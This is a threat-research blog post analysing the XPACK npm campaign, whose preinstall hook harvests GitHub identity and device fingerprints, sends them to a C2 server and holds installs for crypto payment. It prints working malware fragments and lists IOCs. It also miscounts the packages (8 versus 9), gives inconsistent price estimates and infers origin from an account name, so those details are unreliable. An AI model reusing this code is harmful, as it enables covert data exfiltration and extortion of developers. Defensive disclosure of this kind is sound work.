BLOG
XPACK Malware Disguises Cryptocurrency Extortion as NPM Package Monetization
A malware campaign weaponizes npm to extort crypto payments from developers during package installation
By c0a15726-c5b1-4b0d-85e6-fe15553df9e2 ·
The OpenSourceMalware team identified a unique malware campaign called XPACK ATTACK involving 8 malicious packages using a fake "Web3 monetization platform" to extort cryptocurrency payments from developers during npm install. The attack blocks installation until victims pay 0.1 USDC/ETH to the attacker's wallet, while collecting GitHub usernames and device fingerprints. See all the associated threat reports here.
The attacker created a fake ecosystem of "xpack" packages designed to appear as components of a legitimate npm monetization platform:
xpack-per-user- Simulates "per-user" licensingxpack-per-device- Simulates "per-device" licensingxpack-subscription- Simulates subscription modelxpack-sui- Simulates SUI blockchain supportxpack-arc-gateway- References Circle ARC payment gateway
This naming scheme makes the packages appear interconnected and legitimate, potentially tricking developers searching for npm monetization solutions. If developers attempt to install these malicious packages, they face immediate disruption as the installation is blocked for 5 minutes while being forced to make a payment decision under pressure. In the background, the malware is ganking their GitHub identity and their device fingerprint is tracked.
If victims choose to make the payment, they suffer a financial loss ranging from 0.1 USDC (approximately $0.10) to 0.1 ETH (approximately $300), their cryptocurrency wallet address is revealed to the attacker, and the installation proceeds—though the package may contain additional malware. If they refuse to pay, the installation simply fails after wasting 5+ minutes of their development time, and they may not even realize they've encountered malware versus what appeared to be a legitimate paywall for package access.
The Xpack attack represents an evolution in supply chain threats, combining traditional malware techniques with cryptocurrency extortion and sophisticated social engineering.
This is a coordinated campaign by a single attacker, dev.chandra_bose:
Social engineering as the attack vector
Unlike typical software supply chain malware that steals credentials or executes reverse shells, XPACK creatively abuses the HTTP 402 "Payment Required" status code to create a seemingly legitimate payment wall. The infrastructure presents itself as a professional Web3 platform for monetizing open-source software, making it difficult for victims to distinguish between malware and a genuine (albeit questionable) business model.
The attack's effectiveness relies on making extortion look like a legitimate business transaction. Several design choices support this illusion:
HTTP 402 "Payment Required"
The malware uses HTTP status code 402, which is officially reserved for "Payment Required" in the HTTP specification (RFC 7231). While rarely used in practice, this status code gives the attack an air of legitimacy—it's "official" HTTP protocol.
Professional Presentation
Every aspect of the infrastructure appears legitimate:
Modern Next.js/React website with professional design
Cryptocurrency wallet integration (MetaMask, WalletConnect)
Dashboard with analytics and project management
Marketing copy about "monetizing open source"
Support for multiple payment methods and blockchains
Plausible Business Model
The concept of "monetizing npm packages" is not entirely absurd:
GitHub Sponsors exists for open-source funding
Some developers do want to monetize their work
Cryptocurrency micropayments are a discussed solution
Private npm registries charge for access
This makes it harder for victims to immediately identify the attack as malware versus an aggressive (but legal) monetization attempt.
Domain Name Strategy
The domain hack-money-xpack.vercel.app includes "hack-money," which could suggest:
A hackathon project (many hackathons use "hack" in their names)
An ETHGlobal or similar crypto hackathon submission
A proof-of-concept or educational project
This provides cover story options if the infrastructure is investigated.
This is not an isolated incident but a coordinated malware campaign conducted by npm user dev.chandra_bose. Analysis reveals:
Campaign Statistics
Metric
Value
Total Malicious Packages
9
Campaign Duration
February 4-7, 2026 (4 days)
Packages with Identical Malware
6 (67%)
Primary C2 Domain
hack-money-xpack.vercel.app
Mass Deployment Window
3 minutes (6 packages published 21:48-21:51 UTC)
Malware Variants
4 distinct payloads
Complete Package List
Package Name
Downloads
Version
Published
Payload Size
C2 Infrastructure
xpack-per-user
194
1.0.3
2026-02-07
22KB*
Vercel
xpack-per-device
83
1.0.1
2026-02-07
22KB*
Vercel
xpack-sui
86
1.0.1
2026-02-07
22KB*
Vercel
xpack-subscription
82
1.0.1
2026-02-07
22KB*
Vercel
xpack-arc-gateway
67
1.0.1
2026-02-07
22KB*
Vercel
xpack-video-submission
0
1.0.10
2026-02-07
22KB*
Vercel
test-npm-style
1212
1.0.18
2026-02-06
16.7KB
Vercel
xpack-subscription-test
0
1.0.5
2026-02-04
7.1KB
ngrok (testing)
testing-package-xdsfdsfsc
1773
1.0.22
2026-02-07
3KB
ngrok (testing)
Attack Timeline
Feb 4, 2026 10:18 UTC │ xpack-subscription-test published
│ └─ Initial testing with ngrok C2
│
Feb 6, 2026 16:33 UTC │ test-npm-style published
│ └─ First production test with Vercel C2
│
Feb 7, 2026 10:15 UTC │ testing-package-xdsfdsfsc published
│ └─ Final testing with minimal payload
│
Feb 7, 2026 21:48 UTC │ ╔══ MASS DEPLOYMENT ══╗
21:48 │ ║ xpack-video-submission
21:49 │ ║ xpack-arc-gateway
21:49 │ ║ xpack-per-device
21:50 │ ║ xpack-per-user
21:50 │ ║ xpack-subscription
21:51 │ ╚═ xpack-sui
│ └─ 6 packages in 3 minutes (automated)The 3-minute publication window for 6 identical packages strongly suggests the use of automation scripts for mass deployment.
Attack Overview (Single Package Example)
When a developer runs npm install test-npm-style (or any of the 9 malicious packages), the following attack chain executes:
1. npm executes preinstall.js hook
2. Script collects GitHub username via 4 different methods
3. Creates device fingerprint (SHA256 hash of hostname + OS)
4. Exfiltrates data to C2 server (hack-money-xpack.vercel.app)
5. Receives "402 Payment Required" response with crypto wallet
6. Displays professional-looking payment UI in terminal
7. Automatically opens browser to Web3 payment page
8. Polls C2 server every 2.5 seconds for payment confirmation
9. Blocks installation for 5 minutes waiting for payment
10. Installation fails unless cryptocurrency payment receivedTechnical Analysis
Initial Compromise: The Preinstall Hook
The attack begins with an innocent-looking package.json:
{
"name": "test-npm-style",
"version": "1.0.18",
"scripts": {
"preinstall": "node ./preinstall.js"
},
"xpack": {
"projectId": "cml9sepu70000wzxe81w58vrh",
"apiKey": "pay_c2e8dbf9fec1458aac4159dc740269ab",
"host": "<https://hack-money-xpack.vercel.app/>"
}
}The preinstall script executes before any dependencies are installed, giving the malware complete control over the installation process. The xpack configuration section contains C2 credentials and server URLs.
Data Collection: GitHub Identity Extraction
One of the most sophisticated aspects of this attack is its multi-method approach to extracting the victim's GitHub identity:
Method 1: GitHub No-Reply Email
git config --global user.email
# Parses: username@users.noreply.github.comMethod 2: Single-Word Username
git config --global user.name
# Uses if matches pattern: [a-zA-Z0-9-]+Method 3: Git Remote Origin
git remote get-url origin
# Extracts username from: github.com/username/repoMethod 4: SSH Authentication
ssh -T git@github.com
# Parses response: "Hi username! ..."This multi-layered approach ensures high success rates in identifying victims, enabling per-user payment tracking and enforcement.
Device Fingerprinting
The malware creates a unique device identifier:
function deviceFingerprint() {
const raw = `${hostname()}-${platform()}`;
return crypto.createHash("sha256").update(raw).digest("hex");
}While relatively simple, this fingerprint allows the C2 server to track "per-device" payments and prevent the same device from being charged multiple times (or enforce it, depending on the pricing model).
C2 Communication: Payment Extortion Protocol
The C2 server implements a three-phase protocol:
Phase 1: Initial Contact
POST /api/install/start HTTP/1.1
Host: hack-money-xpack.vercel.app
Content-Type: application/json
{
"projectId": "cml9sepu70000wzxe81w58vrh",
"apiKey": "pay_c2e8dbf9fec1458aac4159dc740269ab",
"version": "1.0.18",
"deviceId": "f3e8a7b2c1d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0",
"githubUsername": "victim-developer"
}Response:
HTTP/1.1 402 Payment Required
Content-Type: application/json
{
"status": "payment_required",
"reason": "Payment required to install this package",
"payment": {
"price": 0.1,
"address": "0xA9ab8933Ff0467D51d13ea2bFECD81504Fc6f15a",
"sessionToken": "d1e1a0e662863f829d51198ad761f49dd7d2508ca2ad1ee28fe2ace530c63538",
"instructions": "<https://hack-money-xpack.vercel.app/pay?session=>..."
}
}Phase 2: Browser-Based Payment Collection
Upon receiving the 402 response, the malware:
Displays a professional payment UI in the terminal using ANSI colors
Automatically opens the victim's browser to the payment page
The payment page is a fully functional Next.js/React application with Web3 wallet integration
The terminal output mimics legitimate npm payment services:
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
💳 PAYMENT REQUIRED
Complete payment in the browser. Install will continue automatically.
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
► PAY HERE — Open in browser or copy the link below:
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
<https://hack-money-xpack.vercel.app/pay?session=d1e1a0>...
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
Price: 0.1
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
Press ENTER to open in browser...The payment page features:
Professional Web3 design matching legitimate crypto platforms
Wallet connection support (MetaMask, WalletConnect, etc.)
Support for multiple cryptocurrencies (USDC, ETH, SUI)
Session-based payment tracking
Blockchain payment verification
Phase 3: Payment Polling
While the browser is open, the terminal enters a polling loop:
const POLL_INTERVAL_MS = 2500; // Every 2.5 seconds
const POLL_TIMEOUT_MS = 5 * 60 * 1000; // 5 minutes total
async function pollUntilPaid(apiHost, statusPayload) {
const start = Date.now();
while (Date.now() - start < POLL_TIMEOUT_MS) {
const res = await fetch(`${apiHost}/api/install/status`, {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify(statusPayload)
});
const data = await res.json();
if (data && data.status === "allowed") return true;
await new Promise((r) => setTimeout(r, POLL_INTERVAL_MS));
}
return false;
}This results in:
120 HTTP requests over 5 minutes (if payment not made)
Continuous data exfiltration of device ID and GitHub username
Terminal displays: "Waiting for payment... (complete payment in the browser)"
Installation blocked until payment confirmed or timeout
Terminal Output Persistence
The malware uses an interesting technique to bypass npm's output buffering:
let ttyStream = null;
try {
if (process.platform === "win32") {
ttyStream = fs.createWriteStream("CON", { flags: "a" });
} else {
ttyStream = fs.createWriteStream("/dev/tty", { flags: "a" });
}
} catch (_) {
ttyStream = null;
}By writing directly to /dev/tty (Unix) or CON (Windows), the malware ensures its payment UI is visible even when npm buffers or suppresses script output. This makes the attack more convincing and increases the likelihood of payment.
Xpack's C2 infrastructure
The Command & Control infrastructure is hosted at hack-money-xpack.vercel.app and presents itself as a legitimate Web3 platform for npm package monetization.
The threat actors created a very slick website for this campaign:
Website Features
The C2 includes a fully functional marketing website with:
Landing Page: Professional design claiming to "Monetize your NPM packages with crypto"
Dashboard: Wallet-connected interface for managing "projects" and viewing payment analytics
Payment Page: Web3-enabled payment interface with multi-chain support
Documentation: Explains "subscription," "per-user," and "per-device" pricing models
Pricing Models Advertised
The platform claims to support four monetization models:
Subscription: Recurring payments (time-based)
Per-User: One-time payment per GitHub username
Per-Device: One-time payment per device fingerprint
One-Time: Single payment for permanent access
This creates plausible deniability for the attacker—claiming it's a legitimate business service rather than malware.
API Endpoints
Endpoint
Purpose
Method
/api/install/start
Victim registration, payment demand
POST
/api/install/status
Payment confirmation polling
POST
/pay
Browser-based payment interface
GET
/dashboard
Attacker's control panel
GET
Payment Wallet
All payments are directed to a single Ethereum/EVM address:
0xA9ab8933Ff0467D51d13ea2bFECD81504Fc6f15aSupported cryptocurrencies:
USDC (USD Coin on EVM chains)
ETH (Ethereum)
SUI (Sui blockchain native token)
Payment amount: 0.1 (approximately $0.10 USDC or $10-300+ depending on ETH/SUI price)
Data Exfiltration Summary
Per Installation Attempt
Data Type
Source
Sensitivity
GitHub Username
Git config / remote / SSH
HIGH - PII, tracking
Device Fingerprint
Hostname + OS
MEDIUM - tracking
Operating System
Node.js platform()
LOW - fingerprinting
Package Version
package.json
LOW - metadata
Timestamp
System time
LOW - metadata
Network Traffic
Each installation attempt generates:
1 initial request to
/api/install/start(victim registration)Up to 120 requests to
/api/install/status(polling every 2.5s for 5min)1 browser request to
/pay(payment page)Total: 122 HTTPS requests to C2 infrastructure
Total data exfiltrated per victim: ~60 KB (including HTTP headers)
Indicators of Compromise (IOCs)
Network IOCs
Primary C2 Domain: hack-money-xpack.vercel.app
Secondary C2 Domain: 4373-2401-4900-8fcd-ac9c-6c82-85aa-e5d6-be4c.ngrok-free.app
URLs:
- <https://hack-money-xpack.vercel.app/api/install/start>
- <https://hack-money-xpack.vercel.app/api/install/status>
- <https://hack-money-xpack.vercel.app/pay>
- <https://hack-money-xpack.vercel.app/dashboard>
- <https://4373-2401-4900-8fcd-ac9c-6c82-85aa-e5d6-be4c.ngrok-free.app/api/install/start>
- <https://4373-2401-4900-8fcd-ac9c-6c82-85aa-e5d6-be4c.ngrok-free.app/api/install/status>Cryptocurrency IOCs
Wallet Address: 0xA9ab8933Ff0467D51d13ea2bFECD81504Fc6f15a
Blockchain: Ethereum / EVM-compatible chainsAttacker Attribution
npm Account: dev.chandra_bose
Profile URL: <https://www.npmjs.com/~dev.chandra_bose>
Possible Location: India/South Asia (based on IPv6 prefix 2401:4900::/32)File IOCs - All 9 Malicious Packages
Package Names:
- testing-package-xdsfdsfsc@1.0.22
- test-npm-style@1.0.18
- xpack-per-user@1.0.3
- xpack-per-device@1.0.1
- xpack-sui@1.0.1
- xpack-subscription@1.0.1
- xpack-arc-gateway@1.0.1
- xpack-subscription-test@1.0.5
- xpack-video-submission@1.0.10
MD5 Hashes (preinstall.js):
- 6d84e952ad198a03ec55d741924942a6 (PRIMARY - 6 packages)
- a5510900abd4e46136d113e435ca9b00 (test-npm-style)
- 54772dad022c2081272deeeb08adc126 (xpack-subscription-test)
- f14161c8fbaeba7c37d381d2cb0468c6 (testing-package-xdsfdsfsc)
Project IDs (from package.json xpack.projectId):
- cml9sepu70000wzxe81w58vrh
- cml5jzoa000014zxeq5lelhpl
- cml9cauo40000xoxexaur9rnu
- cml7thc2900006oxe682w03nj
- cml8ip17q0000xxxe2tj6lnny
- cmlc7fhc1000404jszg4xt355
API Keys (from package.json xpack.apiKey):
- pay_c2e8dbf9fec1458aac4159dc740269ab
- pay_135abcf0612547dca4ea432d89f0cdb7
- pay_c041b26bd4d240aa88b2cda39ce8eb1f
- pay_d6117e31ecf149d6bee7f9bff511198b
- pay_af44b8a9576a402a895fa3cbc9e8d85c
- pay_c7d72c0a6063452586d93fcebd99efbcBehavioral IOCs
Preinstall script executes git commands
Automatic browser opening during package install
Network requests to vercel.app domains during installation
Terminal displays cryptocurrency payment interface
HTTP 402 "Payment Required" responses
Polling behavior (repeated HTTPS POST every 2.5 seconds)
Writes to
/dev/ttyorCONfor direct terminal outputExecutes
open/start/xdg-opencommands
Attribution & Context
Attacker Profile: dev.chandra_bose
npm Account: dev.chandra_bose
Profile URL: https://www.npmjs.com/~dev.chandra_bose
Geographic Indicators: Evidence points to Indian/South Asian origin:
Name: Distinctly Indian/Bengali (চন্দ্র বসু)
IPv6 Address:
2401:4900::/32block (allocated to South Asian ISPs)Publication Times: 10:18, 16:33, 21:48-21:51 UTC
Converts to: 15:48, 22:03, 03:18-03:21 IST (India Standard Time)
Late night/early morning pattern (common for side projects)
Technical Skill Level: Intermediate to Advanced
Proficient in JavaScript, Node.js, npm ecosystem
Familiar with Web3/blockchain (USDC, SUI, wallet integration)
Uses modern frameworks (Next.js, React, Vercel)
Capable of CI/CD automation (6 packages in 3 minutes)
Likely a Web3 developer or startup employee
Domain Analysis
Domain: hack-money-xpack.vercel.app
Hosting: Vercel (vercel.app subdomain) Registration: Vercel subdomains are free and require no domain registration
The "hack-money" prefix suggests:
Possible hackathon origin (ETHGlobal has "hack money" themed events)
Could be proof-of-concept that was weaponized
May be malicious actor using hackathon as cover story
Vercel Account: Unknown (requires Vercel cooperation for identification)
Cryptocurrency Wallet
Address: 0xA9ab8933Ff0467D51d13ea2bFECD81504Fc6f15a
Blockchain analysis can reveal:
Total payments received
Number of victims who paid
Destination of funds (exchanges, mixers, etc.)
Transaction timestamps
Potentially linked addresses
Investigators should:
Monitor wallet for incoming transactions
Track fund movements to identify cashout methods
Report to cryptocurrency exchanges for potential freezing
Analyze transaction patterns for victim count estimation
Timeline
Package Published: Unknown (npm package may have been removed)
First Detection: 2026-02-08
C2 Infrastructure Active: Confirmed active as of analysis date
Current Status: Under investigation
Timeline of Attack
T+0s User executes: npm install test-npm-style
T+1s npm reads package.json, sees preinstall script
T+2s preinstall.js executes with Node.js
T+3s Script collects device fingerprint (SHA256 hash)
T+4s Script executes 4 git commands to extract GitHub username
T+5s Script sends HTTPS POST to hack-money-xpack.vercel.app/api/install/start
T+6s C2 returns 402 Payment Required with wallet address
T+7s Terminal displays colorized payment UI
T+8s Script automatically opens browser to payment page
T+10s Polling loop begins (HTTPS POST every 2.5 seconds)
T+12s Poll request #1 - checking for payment
T+15s Poll request #2 - still waiting
T+17s Poll request #3 - still waiting
...
T+5m Poll request #120 - timeout reached
T+5m1s Installation fails with exit code 1If payment made at T+30s:
T+30s User connects wallet and sends 0.1 USDC to attacker
T+35s Blockchain confirms transaction
T+37s Next poll request returns: 200 OK "allowed"
T+38s Installation proceeds normally
T+45s Package fully installed (may contain additional malware)Appendix: Payment Flow Diagram
┌─────────────────────────────────────────────────────────────┐
│ VICTIM │
├─────────────────────────────────────────────────────────────┤
│ │
│ $ npm install test-npm-style │
│ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ preinstall.js executes │ │
│ │ • Collects GitHub username (git config) │ │
│ │ • Creates device fingerprint │ │
│ │ • Contacts C2 server │ │
│ └──────────────────┬───────────────────────────────────┘ │
│ │ │
│ │ POST victim data │
│ ▼ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ C2 Server Response: 402 Payment Required │ │
│ │ Wallet: 0xA9ab8933Ff0467D51d13ea2bFECD81504Fc6f15a │ │
│ │ Amount: 0.1 USDC/ETH/SUI │ │
│ │ Session: d1e1a0e6628... │ │
│ └──────────────────┬───────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ Terminal UI │ │
│ │ ╔════════════════════════════════════════════════╗ │ │
│ │ ║ 💳 PAYMENT REQUIRED ║ │ │
│ │ ║ Price: 0.1 ║ │ │
│ │ ║ <https://hack-money-xpack.vercel.app/pay> ║ │ │
│ │ ╚════════════════════════════════════════════════╝ │ │
│ │ Press ENTER to open browser... │ │
│ └──────────────────┬───────────────────────────────────┘ │
│ │ │
│ │ Browser auto-opens │
│ ▼ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ Browser: Web3 Payment Page │ │
│ │ • Connect wallet (MetaMask) │ │
│ │ • Send 0.1 USDC to wallet │ │
│ │ • Transaction confirmed on-chain │ │
│ └──────────────────┬───────────────────────────────────┘ │
│ │ │
│ │ Payment confirmed │
│ ▼ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ Terminal: Polling Loop (every 2.5s) │ │
│ │ Waiting for payment... ▓▓▓▓▓░░░░░░░░░░░░ │ │
│ │ │ │
│ │ POST /api/install/status → 402 Still required │ │
│ │ POST /api/install/status → 402 Still required │ │
│ │ POST /api/install/status → 200 ALLOWED ✓ │ │
│ └──────────────────┬───────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌──────────────────────────────────────────────────────┐ │
│ │ Installation proceeds │ │
│ │ ✓ test-npm-style@1.0.18 installed │ │
│ └──────────────────────────────────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────┐
│ ATTACKER │
├─────────────────────────────────────────────────────────────┤
│ │
│ • Receives 121+ victim data submissions │
│ • Tracks GitHub usernames + device fingerprints │
│ • Receives 0.1 USDC payment (~$0.10) │
│ • Updates database: session status = "allowed" │
│ • Can view analytics in dashboard │
│ │
└─────────────────────────────────────────────────────────────┘